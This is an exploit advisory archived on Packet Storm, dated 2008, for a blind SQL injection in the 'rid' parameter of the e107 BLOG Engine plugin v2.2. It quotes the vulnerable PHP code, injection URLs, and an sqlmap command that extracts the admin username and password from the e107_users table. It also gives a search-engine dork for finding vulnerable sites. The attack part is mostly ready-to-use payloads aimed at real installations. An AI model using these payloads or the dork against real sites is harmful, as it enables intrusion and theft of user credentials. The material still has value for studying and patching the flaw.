exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

e107blog-blindsql.txt

e107blog-blindsql.txt
Posted May 13, 2008
Authored by Saime

The e107 BLOG engine plugin version 2.2 suffers from a blind SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | b4723a6a5ec828f71e328088ae74fb67edda892301b0b4475a508aeb609e1a40

e107blog-blindsql.txt

Change Mirror Download
[+] Author: Saime
[+] Script: e107 Plugin BLOG Engine v2.2 (rid) Blind SQL Injection
[+] URL: http://e107coders.org/download.php?view.1843
[+] Date: 13/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!
[+] Site: http://h4ck-y0u.org

[+] Vuln File: comment.php
[+] Line: 22-24
$rid = $_GET['rid'];
//blog entry echo
$sql -> db_Query("select ".MPREFIX."macgurublog_rec.*, blog_enable from ".MPREFIX."macgurublog_rec left join ".MPREFIX."macgurublog_main on (".MPREFIX."macgurublog_rec.blogrec_uid=".MPREFIX."macgurublog_main.blog_uid) where blogrec_id=".$rid.";");
[+] Exploit:
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=1-- // returns no errors
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=2-- // returns error about unknown entry
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and substring(@@version,1,1)=4 // check the mysql version. if 4 returns error, try 5.
Since e107 uses diffrent table names it's almost impossible to write exploit for it. So I am suggesting to use sqlmap to use this vulnerabilty.
The command like should look like this:
./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1 --string "string which proofs the query is valid" -e "sql query"
Example:
./sqlmap.py -u "http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1" -p rid -a "./txt/user-agents.txt" -v1 --string "Saime" -e "<SELECT concat(username,0x3a,password) from e107_users where userid=1 limit 0,1>"
[+] Dork: inurl:/macgurublog_menu/
[+] Notes: Not to Turkish Warrior, good job on leaking CipherCrew exploits and submiting them as your own dumbass! ;)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close